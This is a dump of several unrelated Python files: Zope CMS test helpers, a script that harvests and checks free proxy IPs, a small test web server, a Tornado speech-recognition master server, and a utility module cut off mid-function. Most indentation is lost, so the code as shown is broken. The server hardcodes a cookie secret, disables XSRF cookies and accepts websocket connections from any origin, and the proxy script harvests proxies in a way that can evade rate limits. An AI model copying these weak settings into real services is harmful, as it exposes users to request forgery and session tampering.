# Strip out u'' and b'' literals, adapted from
# <https://stackoverflow.com/a/56507895>.
def remove_string_prefix(self, want, got):
return (re.sub(self.string_prefix, r'\1\2', want),
re.sub(self.string_prefix, r'\1\2', got))
def check_output(self, want, got, optionflags):
# `want` is already unicode, since we pass `encoding` to DocFileSuite.
if not isinstance(got, six.text_type):
got = got.decode('utf-8')
want, got = self.remove_string_prefix(want, got)
super_ = zope.testing.renormalizing.RENormalizing
return super_.check_output(self, want, got, optionflags)
def output_difference(self, example, got, optionflags):
if not isinstance(got, six.text_type):
got = got.decode('utf-8')
example.want, got = self.remove_string_prefix(example.want, got)
super_ = zope.testing.renormalizing.RENormalizing
return super_.output_difference(self, example, got, optionflags)
checker = OutputChecker([
(re.compile(r'\d{4} \d{1,2} \d{1,2} \d\d:\d\d:\d\d'), '<FORMATTED DATE>'),
(re.compile('0x[0-9a-f]+'), "0x..."),
(re.compile(r'/\+\+noop\+\+[0-9a-f]+'), ''),
(re.compile(
'[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}'),
"<GUID>"),
])
def remove_exception_module(msg):
"""Copy&paste so we keep the exception message and support multi-line."""
start, end = 0, len(msg)
name_end = msg.find(':', 0, end)
i = msg.rfind('.', 0, name_end)
if i >= 0:
start = i + 1
return msg[start:end]
if sys.version_info > (3,):
doctest._strip_exception_details = remove_exception_module
optionflags = (doctest.REPORT_NDIFF +
doctest.NORMALIZE_WHITESPACE +
doctest.ELLIPSIS +
doctest.IGNORE_EXCEPTION_DETAIL)
def DocFileSuite(*paths, **kw):
kw['package'] = doctest._normalize_module(kw.get('package'))
kw.setdefault('checker', checker)
kw.setdefault('optionflags', optionflags)
kw['encoding'] = 'utf-8'
return doctest.DocFileSuite(*paths, **kw)
def FunctionalDocFileSuite(*paths, **kw):
layer = kw.pop('layer', WSGI_LAYER)
kw['package'] = doctest._normalize_module(kw.get('package'))
globs = kw.setdefault('globs', {})
globs['getRootFolder'] = lambda: layer['zodbApp']
globs['layer'] = layer
kw.setdefault('checker', checker)
kw.setdefault('optionflags', optionflags)
kw['encoding'] = 'utf-8'
test = doctest.DocFileSuite(*paths, **kw)
test.layer = layer
return test
class RepositoryHelper(object):
@property
def repository(self):
import zeit.cms.repository.interfaces
with site(self.getRootFolder()):
return zope.component.getUtility(
zeit.cms.repository.interfaces.IRepository)
@repository.setter
def repository(self, value):
self.__dict__['repository'] = value
class FunctionalTestCase(
unittest.TestCase,
gocept.testing.assertion.Ellipsis,
gocept.testing.assertion.Exceptions,
gocept.testing.assertion.String,
RepositoryHelper):
def getRootFolder(self):
"""Returns the Zope root folder."""
return self.layer['zodbApp']
def setUp(self):
super(FunctionalTestCase, self).setUp()
zope.component.hooks.setSite(self.getRootFolder())
self.principal = create_interaction(u'zope.user')
# XXX We should subclass instead of monkey-patch, but then I'd have
# to change all the layer declarations in the zeit.* packages, sigh.
def selenium_setup_authcache(self):
# NOTE: Massively kludgy workaround. It seems that Firefox has a timing
# issue with HTTP auth and AJAX calls: if you open a page that requires
# auth and has AJAX calls to further pages that require the same auth,
# sometimes those AJAX calls come back as 401 (nothing to do with
# Selenium, we've seen this against the actual server).
#
# It seems that opening a page and then giving it a little time
# to settle in is enough to work around this issue.
original_setup(self)
s = self['selenium']
self['http_auth_cache'] = True
# XXX It seems something is not ready immediately?!??
s.pause(1000)
# XXX Credentials are duplicated from SeleniumTestCase.open().
s.open('http://user:userpw@%s/++skin++vivi/@@test-setup-auth'
% self['http_address'])
# We don't really know how much time the browser needs until it's
# satisfied, or how we could determine this.
s.pause(1000)
original_setup = gocept.selenium.webdriver.WebdriverSeleneseLayer.setUp
gocept.selenium.webdriver.WebdriverSeleneseLayer.setUp = (
selenium_setup_authcache)
def selenium_teardown_authcache(self):
original_teardown(self)
del self['http_auth_cache']
original_teardown = gocept.selenium.webdriver.WebdriverSeleneseLayer.tearDown
gocept.selenium.webdriver.WebdriverSeleneseLayer.tearDown = (
selenium_teardown_authcache)
@pytest.mark.selenium
class SeleniumTestCase(gocept.selenium.WebdriverSeleneseTestCase,
FunctionalTestCase):
skin = 'cms'
log_errors = False
log_errors_ignore = ()
level = 2
TIMEOUT = int(os.environ.get('ZEIT_SELENIUM_TIMEOUT', 10))
window_width = 1100
window_height = 600
def setUp(self):
super(SeleniumTestCase, self).setUp()
self.layer['selenium'].setTimeout(self.TIMEOUT * 1000)
if self.log_errors:
error_log = zope.component.getUtility(
zope.error.interfaces.IErrorReportingUtility)
error_log.copy_to_zlog = True
error_log._ignored_exceptions = self.log_errors_ignore
self.log_handler = logging.StreamHandler(sys.stdout)
logging.root.addHandler(self.log_handler)
self.old_log_level = logging.root.level
logging.root.setLevel(logging.WARN)
transaction.commit()
self.original_windows = set(self.selenium.getAllWindowIds())
self.original_width = self.selenium.getEval('window.outerWidth')
self.original_height = self.selenium.getEval('window.outerHeight')
self.selenium.setWindowSize(self.window_width, self.window_height)
self.execute('window.localStorage.clear()')
def tearDown(self):
super(SeleniumTestCase, self).tearDown()
if self.log_errors:
logging.root.removeHandler(self.log_handler)
logging.root.setLevel(self.old_log_level)
current_windows = set(self.selenium.getAllWindowIds())
for window in current_windows - self.original_windows:
self.selenium.selectWindow(window)
self.selenium.close()
self.selenium.selectWindow()
self.selenium.setWindowSize(self.original_width, self.original_height)
# open a neutral page to stop all pending AJAX requests
self.open('/@@test-setup-auth')
def open(self, path, auth='user:userpw'):
if auth:
auth += '@'
self.selenium.open(
'http://%s%s/++skin++%s%s' % (
auth, self.selenium.server, self.skin, path))
def click_label(self, label):
self.selenium.click('//label[contains(string(.), %s)]' %
xml.sax.saxutils.quoteattr(label))
js_globals = """\
var document = window.document;
var zeit = window.zeit;
"""
def execute(self, text):
return self.selenium.selenium.execute_script(self.js_globals + text)
def eval(self, text):
return self.execute('return ' + text)
def wait_for_condition(self, text):
self.selenium.waitForCondition(self.js_globals + """\
return Boolean(%s);
""" % text)
def wait_for_dotted_name(self, dotted_name):
partial = []
for part in dotted_name.split('.'):
partial.append(part)
self.wait_for_condition('.'.join(partial))
def add_by_autocomplete(self, text, widget):
s = self.selenium
s.type(widget, text)
autocomplete_item = 'css=.ui-menu-item a'
s.waitForElementPresent(autocomplete_item)
s.waitForVisible(autocomplete_item)
s.click(autocomplete_item)
s.waitForNotVisible('css=.ui-menu')
def click_wo_redirect(browser, *args, **kwargs):
browser.follow_redirects = False
try:
browser.getLink(*args, **kwargs).click()
        print(browser.headers['Status'])
        print(browser.headers['Location'])
finally:
browser.follow_redirects = True
def set_site(site=None):
"""Encapsulation of the getSite/setSite-dance, with doctest support."""
globs = sys._getframe(1).f_locals
if site is None:
site = globs['getRootFolder']()
zope.component.hooks.setSite(site)
# XXX use zope.publisher.testing for the following two
def create_interaction(name='zope.user'):
name = six.text_type(name) # XXX At least zope.dublincore requires unicode
principal = zope.security.testing.Principal(
name, groups=['zope.Authenticated'], description=u'test@example.com')
request = zope.publisher.browser.TestRequest()
request.setPrincipal(principal)
zope.security.management.newInteraction(request)
return principal
@contextlib.contextmanager
def interaction(principal_id=u'zope.user'):
if zope.security.management.queryInteraction():
# There already is an interaction. Great. Leave it alone.
yield
else:
principal = create_interaction(principal_id)
yield principal
zope.security.management.endInteraction()
# XXX use zope.component.testing.site instead
@contextlib.contextmanager
def site(root):
old_site = zope.component.hooks.getSite()
zope.component.hooks.setSite(root)
yield
zope.component.hooks.setSite(old_site)
@zope.interface.implementer(zope.i18n.interfaces.IGlobalMessageCatalog)
class TestCatalog(object):
language = 'tt'
messages = {}
def queryMessage(self, msgid, default=None):
return self.messages.get(msgid, default)
getMessage = queryMessage
def getIdentifier(self):
return 'test'
def reload(self):
pass
def copy_inherited_functions(base, locals):
"""py.test annotates the test function object with data, e.g. required
fixtures. Normal inheritance means that there is only *one* function object
(in the base class), which means for example that subclasses cannot specify
different layers, since they would all aggregate on that one function
object, which would be completely wrong.
Usage: copy_inherited_functions(BaseClass, locals())
"""
def make_delegate(name):
def delegate(self):
return getattr(super(type(self), self), name)()
return delegate
for name in dir(base):
if not name.startswith('test_'):
continue
locals[name] = make_delegate(name)
class BrowserAssertions(gocept.testing.assertion.Ellipsis):
# XXX backwards-compat method signature for existing tests, should probably
# be removed at some point
def assert_ellipsis(self, want, got=None):
if got is None:
got = self.browser.contents
self.assertEllipsis(want, got)
def assert_json(self, want, got=None):
if got is None:
got = self.browser.contents
data = json.loads(got)
self.assertEqual(want, data)
return data
class Browser(zope.testbrowser.browser.Browser):
follow_redirects = True
xml_strict = False
def __init__(self, wsgi_app):
super(Browser, self).__init__(wsgi_app=wsgi_app)
def login(self, username, password):
auth = base64.b64encode(
('%s:%s' % (username, password)).encode('utf-8'))
if sys.version_info > (3,):
auth = auth.decode('ascii')
self.addHeader('Authorization', 'Basic %s' % auth)
def reload(self):
# Don't know what the superclass is doing here, exactly, but it's not
# helpful at all, so we reimplement it in a hopefully more sane way.
if self._response is None:
raise zope.testbrowser.browser.BrowserStateError(
'No URL has yet been .open()ed')
self.open(self.url)
def _processRequest(self, url, make_request):
self._document = None
transaction.commit()
old_site = zope.component.hooks.getSite()
zope.component.hooks.setSite(None)
old_interaction = zope.security.management.queryInteraction()
zope.security.management.endInteraction()
try:
# No super call, since we had to copy&paste the whole method.
self._do_processRequest(url, make_request)
finally:
zope.component.hooks.setSite(old_site)
if old_interaction:
zope.security.management.thread_local.interaction = (
old_interaction)
# copy&paste from superclass _processRequest to plug in `follow_redirects`
def _do_processRequest(self, url, make_request):
with self._preparedRequest(url) as reqargs:
self._history.add(self._response)
resp = make_request(reqargs)
if self.follow_redirects:
remaining_redirects = 100 # infinite loops protection
while (remaining_redirects and
resp.status_int in zope.testbrowser.browser.REDIRECTS):
remaining_redirects -= 1
url = urljoin(url, resp.headers['location'])
with self._preparedRequest(url) as reqargs:
resp = self.testapp.get(url, **reqargs)
assert remaining_redirects > 0, "redirect chain looks infinite"
self._setResponse(resp)
self._checkStatus()
HTML_PARSER = lxml.html.HTMLParser(encoding='UTF-8')
_document = None
@property
def document(self):
"""Return an lxml.html.HtmlElement instance of the response body."""
if self._document is not None:
return self._document
if self.contents is not None:
if self.xml_strict:
self._document = lxml.etree.fromstring(self.contents)
else:
self._document = lxml.html.document_fromstring(
self.contents, parser=self.HTML_PARSER)
return self._document
def xpath(self, selector, **kw):
"""Return a list of lxml.HTMLElement instances that match a given
XPath selector.
"""
if self.document is not None:
return self.document.xpath(selector, **kw)
# Allow webtest to handle file download result iterators
webtest.lint.isinstance = zope.security.proxy.isinstance
class BrowserTestCase(FunctionalTestCase, BrowserAssertions):
login_as = ('user', 'userpw')
def setUp(self):
super(BrowserTestCase, self).setUp()
self.browser = Browser(self.layer['wsgi_app'])
if isinstance(self.login_as, six.string_types): # BBB:
self.login_as = self.login_as.split(':')
self.browser.login(*self.login_as)
# These ugly names are due to two reasons:
# 1. zeit.cms.testing contains both general test mechanics *and*
# specific test infrastructure/layers for zeit.cms itself
# 2. pytest does not allow for subclassing a TestCase and changing its layer
# (for the same reason as copy_inherited_functions above).
class ZeitCmsTestCase(FunctionalTestCase):
layer = ZOPE_LAYER
class ZeitCmsBrowserTestCase(BrowserTestCase):
layer = WSGI_LAYER
class JSLintTestCase(gocept.jslint.TestCase):
jshint_command = os.environ.get('JSHINT_COMMAND', '/bin/true')
options = {
'esversion': '6',
'evil': True,
'eqnull': True,
'multistr': True,
'sub': True,
'undef': True,
'browser': True,
'jquery': True,
'devel': True,
}
predefined = (
'zeit', 'gocept',
'application_url', 'context_url',
'DOMParser', 'escape', 'unescape',
'jsontemplate',
'MochiKit', '$$', 'forEach', 'filter', 'map', 'extend', 'bind',
'log', 'repr', 'logger', 'logDebug', 'logError', # XXX
'DIV', 'A', 'UL', 'LI', 'INPUT', 'IMG', 'SELECT', 'OPTION', 'BUTTON',
'SPAN', 'LABEL',
'isNull', 'isUndefined', 'isUndefinedOrNull',
'Uri',
'_', # js.underscore
)
ignore = (
"Functions declared within loops",
"Expected an identifier and instead saw 'import'",
"Use '===' to compare with",
"Use '!==' to compare with",
"Missing radix parameter",
"Misleading line break",
"Expected an assignment or function call and instead"
" saw an expression",
)
def _write_config_file(self):
"""Copy&paste from baseclass, so we can use non-boolean options."""
settings = self.options.copy()
predefined = settings['predef'] = []
for name in self.predefined:
predefined.append(name)
handle, filename = tempfile.mkstemp()
output = open(filename, 'w')
json.dump(settings, output)
output.close()
return filename
original = datetime.datetime
class FreezeMeta(type):
    def __instancecheck__(self, instance):
        # return an explicit boolean instead of implicitly returning None
        return type(instance) == original or type(instance) == Freeze
class Freeze(six.with_metaclass(FreezeMeta, datetime.datetime)):
@classmethod
def freeze(cls, val):
cls.frozen = val
@classmethod
def now(cls, tz=None):
if tz is not None:
if cls.frozen.tzinfo is None:
# https://docs.python.org/2/library/datetime.html says,
# the result is equivalent to tz.fromutc(
# datetime.utcnow().replace(tzinfo=tz)).
return tz.fromutc(cls.frozen.replace(tzinfo=tz))
else:
return cls.frozen.astimezone(tz)
return cls.frozen
@classmethod
def today(cls, tz=None):
return Freeze.now(tz)
@classmethod
def delta(cls, timedelta=None, **kwargs):
""" Moves time fwd/bwd by the delta"""
if not timedelta:
timedelta = datetime.timedelta(**kwargs)
cls.frozen += timedelta
@contextlib.contextmanager
def clock(dt=None):
if dt is None:
dt = original.utcnow()
with mock.patch('datetime.datetime', Freeze):
Freeze.freeze(dt)
yield Freeze
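# A usage sketch for clock() (timestamps illustrative): inside the context,
# datetime.datetime is patched to the Freeze class above.
# with clock(datetime.datetime(2020, 1, 1)) as frozen:
#     assert datetime.datetime.now() == frozen.frozen
#     frozen.delta(hours=1)  # advance the frozen time by one hour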
def xmltotext(xml):
return lxml.etree.tostring(xml, pretty_print=True, encoding=six.text_type)
|
test.py
|
# -*- coding: utf-8 -*-
import urllib.request
import urllib
import re
import time
import random
import socket
import threading
import requests
# Scrape proxy IPs
ip_totle = []
for page in range(2, 6):
    # url = 'http://ip84.com/dlgn/' + str(page)
    url = 'http://www.xicidaili.com/wn/' + str(page)  # Xici proxy site
# url = "https://www.kuaidaili.com/free/inha/"+str(page)
# headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64)"}
headers = {'Accept-Encoding': 'gzip',
'Host': 'www.xicidaili.com',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36'}
# request = urllib.request.Request(url=url, headers=headers)
# response = urllib.request.urlopen(request)
# content = response.read().decode('utf-8')
req = requests.get(url=url, headers=headers)
content = req.text
print('get page', page)
    pattern = re.compile(r'<td>(\d.*?)</td>')  # capture <td>...</td> contents whose first character is a digit
ip_page = re.findall(pattern, str(content))
ip_totle.extend(ip_page)
time.sleep(random.choice(range(1, 3)))
# Print the scraped content
print('Proxy IP', '\t', 'Port', '\t', 'Speed', '\t', 'Verified at')
for i in range(0, len(ip_totle), 4):
print(ip_totle[i], ' ', '\t', ip_totle[i + 1], '\t', ip_totle[i + 2], '\t', ip_totle[i + 3])
# Arrange the proxy IPs into the expected format
proxys = []
for i in range(0, len(ip_totle), 4):
proxy_host = ip_totle[i] + ':' + ip_totle[i + 1]
proxy_temp = {"https": proxy_host}
proxys.append(proxy_temp)
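# Each entry now has the shape {"https": "1.2.3.4:8080"} (address illustrative),
# which is the mapping format urllib.request.ProxyHandler expects below.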
proxy_ip = open('proxy_ip_baidu.txt', 'w')  # create a file for storing working IPs
lock = threading.Lock()  # create a lock
# Function that verifies whether a proxy IP works
def test(i):
    socket.setdefaulttimeout(10)  # set the global timeout
    url = "https://www.baidu.com/"  # target URL to crawl; alternatives: https://fanyi.baidu.com/transapi https://www.javatpoint.com
try:
proxy_support = urllib.request.ProxyHandler(proxys[i])
opener = urllib.request.build_opener(proxy_support)
opener.addheaders = [("User-Agent", "Mozilla/5.0 (Windows NT 10.0; WOW64)")]
urllib.request.install_opener(opener)
res = urllib.request.urlopen(url).read()
        lock.acquire()  # acquire the lock
        print(proxys[i], 'is OK')
        proxy_ip.write('%s\n' % str(proxys[i]))  # record this proxy IP
        lock.release()  # release the lock
except Exception as e:
lock.acquire()
print(proxys[i], e)
lock.release()
# Single-threaded verification
'''for i in range(len(proxys)):
test(i)'''
# Multi-threaded verification
threads = []
for i in range(len(proxys)):
thread = threading.Thread(target=test, args=[i])
threads.append(thread)
thread.start()
# Block the main process until all worker threads finish
for thread in threads:
thread.join()
proxy_ip.close()  # close the file
|
serve.py
|
#
# A simple webserver MEANT FOR TESTING based off of http.server.
#
import http.server
import socketserver
import os
from multiprocessing import Process
import generate
import yaml
from threading import Timer
# Credit: http://stackoverflow.com/a/13151299/6388442
class RepeatedTimer(object):
def __init__(self, interval, function, *args, **kwargs):
self._timer = None
self.interval = interval
self.function = function
self.args = args
self.kwargs = kwargs
self.is_running = False
self.start()
def _run(self):
self.is_running = False
self.start()
self.function(*self.args, **self.kwargs)
def start(self):
if not self.is_running:
self._timer = Timer(self.interval, self._run)
self._timer.start()
self.is_running = True
def stop(self):
self._timer.cancel()
self.is_running = False
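# Usage sketch for RepeatedTimer (interval illustrative): the timer starts
# itself on construction and re-arms after every call.
# rt = RepeatedTimer(5, print, "tick")  # calls print("tick") every 5 seconds
# ...
# rt.stop()  # cancel the pending timer when done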
def serve(PORT=80, SERVE="."):
# Declare the processes
serveProcess = Process(target=rawServe, args=[PORT, SERVE])
genProcess = Process(target=autoGen)
serveProcess.start()
genProcess.start()
def rawServe(PORT, SERVE):
print("rawServe started.")
web_dir = os.path.join(os.path.dirname(__file__), SERVE)
os.chdir(web_dir)
Handler = http.server.SimpleHTTPRequestHandler
httpd = socketserver.TCPServer(("", PORT), Handler)
print("Serving at port: ", PORT)
try:
httpd.serve_forever()
except KeyboardInterrupt:
print("^C: Ending rawServe...")
def autoGen():
print("AutoGen started.")
print("Loading config...")
    with open("config/painless.yml", "r") as config_file:
        config = yaml.safe_load(config_file)  # safe_load avoids arbitrary object construction and the PyYAML load() warning
print("Setting timer...")
rt = RepeatedTimer(config["options"]["reloadTime"], generate.generate, config["options"]["outputDirectory"]) # Auto-starts
|
master_server.py
|
#!/usr/bin/env python
#
# Copyright 2013 Tanel Alumae
"""
Reads speech data via websocket requests, forwards it to an available worker, waits
for results from the worker and forwards them to the client via websocket
"""
import sys
import logging
import json
import codecs
import os.path
import uuid
import time
import threading
import functools
from Queue import Queue
import tornado.ioloop
import tornado.options
import tornado.web
import tornado.websocket
import tornado.gen
import tornado.concurrent
import settings
import common
import os
if os.environ.get('WSS'):
import ssl
class Application(tornado.web.Application):
def __init__(self):
settings = dict(
cookie_secret="43oETzKXQAGaYdkL5gEmGeJJFuYh7EQnp2XdTP1o/Vo=",
template_path=os.path.join(os.path.dirname(os.path.dirname(__file__)), "templates"),
static_path=os.path.join(os.path.dirname(os.path.dirname(__file__)), "static"),
xsrf_cookies=False,
autoescape=None,
)
handlers = [
(r"/", MainHandler),
(r"/client/ws/speech", DecoderSocketHandler),
(r"/client/ws/status", StatusSocketHandler),
(r"/client/dynamic/reference", ReferenceHandler),
(r"/client/dynamic/recognize", HttpChunkedRecognizeHandler),
(r"/worker/ws/speech", WorkerSocketHandler),
(r"/client/static/(.*)", tornado.web.StaticFileHandler, {'path': settings["static_path"]}),
]
tornado.web.Application.__init__(self, handlers, **settings)
self.available_workers = set()
self.status_listeners = set()
self.num_requests_processed = 0
def send_status_update_single(self, ws):
status = dict(num_workers_available=len(self.available_workers), num_requests_processed=self.num_requests_processed)
ws.write_message(json.dumps(status))
def send_status_update(self):
for ws in self.status_listeners:
self.send_status_update_single(ws)
def save_reference(self, content_id, content):
refs = {}
try:
with open("reference-content.json") as f:
refs = json.load(f)
        except Exception:
            pass  # no existing reference file yet; start fresh
refs[content_id] = content
with open("reference-content.json", "w") as f:
json.dump(refs, f, indent=2)
class MainHandler(tornado.web.RequestHandler):
def get(self):
current_directory = os.path.dirname(os.path.abspath(__file__))
parent_directory = os.path.join(current_directory, os.pardir)
readme = os.path.join(parent_directory, "README.md")
self.render(readme)
def run_async(func):
@functools.wraps(func)
def async_func(*args, **kwargs):
func_hl = threading.Thread(target=func, args=args, kwargs=kwargs)
func_hl.start()
return func_hl
return async_func
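# Usage note: functions decorated with @run_async accept a `callback` argument
# (see get_final_hyp below) and are awaited via tornado.gen.Task, which supplies
# the callback and resumes the coroutine once it fires.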
def content_type_to_caps(content_type):
"""
Converts MIME-style raw audio content type specifier to GStreamer CAPS string
"""
default_attributes= {"rate": 16000, "format" : "S16LE", "channels" : 1, "layout" : "interleaved"}
media_type, _, attr_string = content_type.replace(";", ",").partition(",")
if media_type in ["audio/x-raw", "audio/x-raw-int"]:
media_type = "audio/x-raw"
attributes = default_attributes
for (key,_,value) in [p.partition("=") for p in attr_string.split(",")]:
attributes[key.strip()] = value.strip()
return "%s, %s" % (media_type, ", ".join(["%s=%s" % (key, value) for (key,value) in attributes.iteritems()]))
else:
return content_type
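# Illustrative example (not from a live request): a raw-audio content type like
# "audio/x-raw, rate=44100, channels=2" is rewritten by content_type_to_caps()
# into a GStreamer CAPS string such as
# "audio/x-raw, rate=44100, format=S16LE, channels=2, layout=interleaved"
# (attribute order follows the dict and may vary).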
@tornado.web.stream_request_body
class HttpChunkedRecognizeHandler(tornado.web.RequestHandler):
"""
Provides a HTTP POST/PUT interface supporting chunked transfer requests, similar to that provided by
http://github.com/alumae/ruby-pocketsphinx-server.
"""
def prepare(self):
self.id = str(uuid.uuid4())
self.final_hyp = ""
self.final_result_queue = Queue()
self.user_id = self.request.headers.get("device-id", "none")
self.content_id = self.request.headers.get("content-id", "none")
logging.info("%s: OPEN: user='%s', content='%s'" % (self.id, self.user_id, self.content_id))
self.worker = None
self.error_status = 0
self.error_message = None
try:
self.worker = self.application.available_workers.pop()
self.application.send_status_update()
logging.info("%s: Using worker %s" % (self.id, self.__str__()))
self.worker.set_client_socket(self)
content_type = self.request.headers.get("Content-Type", None)
if content_type:
content_type = content_type_to_caps(content_type)
logging.info("%s: Using content type: %s" % (self.id, content_type))
self.worker.write_message(json.dumps(dict(id=self.id, content_type=content_type, user_id=self.user_id, content_id=self.content_id)))
except KeyError:
logging.warn("%s: No worker available for client request" % self.id)
self.set_status(503)
self.finish("No workers available")
def data_received(self, chunk):
assert self.worker is not None
logging.debug("%s: Forwarding client message of length %d to worker" % (self.id, len(chunk)))
self.worker.write_message(chunk, binary=True)
def post(self, *args, **kwargs):
self.end_request(args, kwargs)
def put(self, *args, **kwargs):
self.end_request(args, kwargs)
@run_async
def get_final_hyp(self, callback=None):
logging.info("%s: Waiting for final result..." % self.id)
callback(self.final_result_queue.get(block=True))
@tornado.web.asynchronous
@tornado.gen.coroutine
def end_request(self, *args, **kwargs):
logging.info("%s: Handling the end of chunked recognize request" % self.id)
assert self.worker is not None
self.worker.write_message("EOS", binary=True)
logging.info("%s: yielding..." % self.id)
hyp = yield tornado.gen.Task(self.get_final_hyp)
if self.error_status == 0:
logging.info("%s: Final hyp: %s" % (self.id, hyp))
response = {"status" : 0, "id": self.id, "hypotheses": [{"utterance" : hyp}]}
self.write(response)
else:
logging.info("%s: Error (status=%d) processing HTTP request: %s" % (self.id, self.error_status, self.error_message))
response = {"status" : self.error_status, "id": self.id, "message": self.error_message}
self.write(response)
self.application.num_requests_processed += 1
self.application.send_status_update()
self.worker.set_client_socket(None)
self.worker.close()
self.finish()
logging.info("Everything done")
def send_event(self, event):
event_str = str(event)
if len(event_str) > 100:
event_str = event_str[:97] + "..."
logging.info("%s: Receiving event %s from worker" % (self.id, event_str))
if event["status"] == 0 and ("result" in event):
try:
if len(event["result"]["hypotheses"]) > 0 and event["result"]["final"]:
if len(self.final_hyp) > 0:
self.final_hyp += " "
self.final_hyp += event["result"]["hypotheses"][0]["transcript"]
            except Exception as e:
                logging.warning("Failed to extract hypothesis from recognition result: %s" % e)
elif event["status"] != 0:
self.error_status = event["status"]
self.error_message = event.get("message", "")
def close(self):
logging.info("%s: Receiving 'close' from worker" % (self.id))
self.final_result_queue.put(self.final_hyp)
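# Illustrative client sketch (not part of the original server): streams a raw
# audio file to the chunked-recognize endpoint handled above. The host, port
# and file name are assumptions; the header names mirror prepare().
def _example_chunked_recognize_client(host="localhost", port=8888):
    import requests  # assumed available in the client environment
    headers = {
        "device-id": "demo-device",
        "content-id": "demo-content",
        "Content-Type": "audio/x-raw, rate=16000",
    }
    url = "http://%s:%d/client/dynamic/recognize" % (host, port)
    with open("speech.raw", "rb") as audio:  # hypothetical raw-audio file
        return requests.post(url, headers=headers, data=audio).json()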
class ReferenceHandler(tornado.web.RequestHandler):
def post(self, *args, **kwargs):
content_id = self.request.headers.get("Content-Id")
if content_id:
content = codecs.decode(self.request.body, "utf-8")
user_id = self.request.headers.get("User-Id", "")
self.application.save_reference(content_id, dict(content=content, user_id=user_id, time=time.strftime("%Y-%m-%dT%H:%M:%S")))
logging.info("Received reference text for content %s and user %s" % (content_id, user_id))
self.set_header('Access-Control-Allow-Origin', '*')
else:
self.set_status(400)
self.finish("No Content-Id specified")
def options(self, *args, **kwargs):
self.set_header('Access-Control-Allow-Origin', '*')
self.set_header('Access-Control-Allow-Methods', 'POST, OPTIONS')
self.set_header('Access-Control-Max-Age', 1000)
# note that '*' is not valid for Access-Control-Allow-Headers
self.set_header('Access-Control-Allow-Headers', 'origin, x-csrftoken, content-type, accept, User-Id, Content-Id')
class StatusSocketHandler(tornado.websocket.WebSocketHandler):
# needed for Tornado 4.0
def check_origin(self, origin):
return True
def open(self):
logging.info("New status listener")
self.application.status_listeners.add(self)
self.application.send_status_update_single(self)
def on_close(self):
logging.info("Status listener left")
self.application.status_listeners.remove(self)
class WorkerSocketHandler(tornado.websocket.WebSocketHandler):
def __init__(self, application, request, **kwargs):
tornado.websocket.WebSocketHandler.__init__(self, application, request, **kwargs)
self.client_socket = None
# needed for Tornado 4.0
def check_origin(self, origin):
return True
def open(self):
self.client_socket = None
self.application.available_workers.add(self)
logging.info("New worker available " + self.__str__())
self.application.send_status_update()
def on_close(self):
logging.info("Worker " + self.__str__() + " leaving")
self.application.available_workers.discard(self)
if self.client_socket:
self.client_socket.close()
self.application.send_status_update()
def on_message(self, message):
assert self.client_socket is not None
event = json.loads(message)
self.client_socket.send_event(event)
def set_client_socket(self, client_socket):
self.client_socket = client_socket
class DecoderSocketHandler(tornado.websocket.WebSocketHandler):
# needed for Tornado 4.0
def check_origin(self, origin):
return True
def send_event(self, event):
event["id"] = self.id
event_str = str(event)
if len(event_str) > 100:
event_str = event_str[:97] + "..."
logging.info("%s: Sending event %s to client" % (self.id, event_str))
self.write_message(json.dumps(event))
def open(self):
self.id = str(uuid.uuid4())
logging.info("%s: OPEN" % (self.id))
logging.info("%s: Request arguments: %s" % (self.id, " ".join(["%s=\"%s\"" % (a, self.get_argument(a)) for a in self.request.arguments])))
self.user_id = self.get_argument("user-id", "none", True)
self.content_id = self.get_argument("content-id", "none", True)
self.worker = None
try:
self.worker = self.application.available_workers.pop()
self.application.send_status_update()
logging.info("%s: Using worker %s" % (self.id, self.__str__()))
self.worker.set_client_socket(self)
content_type = self.get_argument("content-type", None, True)
if content_type:
logging.info("%s: Using content type: %s" % (self.id, content_type))
self.worker.write_message(json.dumps(dict(id=self.id, content_type=content_type, user_id=self.user_id, content_id=self.content_id)))
except KeyError:
logging.warn("%s: No worker available for client request" % self.id)
event = dict(status=common.STATUS_NOT_AVAILABLE, message="No decoder available, try again later")
self.send_event(event)
self.close()
def on_connection_close(self):
logging.info("%s: Handling on_connection_close()" % self.id)
self.application.num_requests_processed += 1
self.application.send_status_update()
if self.worker:
try:
self.worker.set_client_socket(None)
logging.info("%s: Closing worker connection" % self.id)
self.worker.close()
            except Exception:
                pass
def on_message(self, message):
assert self.worker is not None
logging.info("%s: Forwarding client message (%s) of length %d to worker" % (self.id, type(message), len(message)))
if isinstance(message, unicode):
self.worker.write_message(message, binary=False)
else:
self.worker.write_message(message, binary=True)
def main():
logging.basicConfig(level=logging.DEBUG, format="%(levelname)8s %(asctime)s %(message)s ")
logging.debug('Starting up server')
from tornado.options import options
tornado.options.parse_command_line()
app = Application()
    if os.environ.get('WSS'):
        ssl_ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
        ssl_ctx.load_cert_chain('/etc/letsencrypt/live/host/cert1.pem', '/etc/letsencrypt/live/host/privkey1.pem')
        logging.info('wss')
        app.listen(options.port, ssl_options=ssl_ctx)
else:
logging.info('ws')
app.listen(options.port)
tornado.ioloop.IOLoop.instance().start()
if __name__ == "__main__":
main()
|
_utils.py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import contextlib
import errno
import logging
import multiprocessing
import os
import select
import signal
import sys
import threading
import time
if os.name == 'posix':
import fcntl
LOG = logging.getLogger(__name__)
_SIGNAL_TO_NAME = dict((getattr(signal, name), name) for name in dir(signal)
if name.startswith("SIG") and name not in ('SIG_DFL',
'SIG_IGN'))
def signal_to_name(sig):
return _SIGNAL_TO_NAME.get(sig, sig)
def spawn(target, *args, **kwargs):
t = threading.Thread(target=target, args=args, kwargs=kwargs)
t.daemon = True
t.start()
return t
def check_workers(workers, minimum):
if not isinstance(workers, int) or workers < minimum:
raise ValueError("'workers' must be an int >= %d, not: %s (%s)" %
(minimum, workers, type(workers).__name__))
def check_callable(thing, name):
if not hasattr(thing, "__call__"):
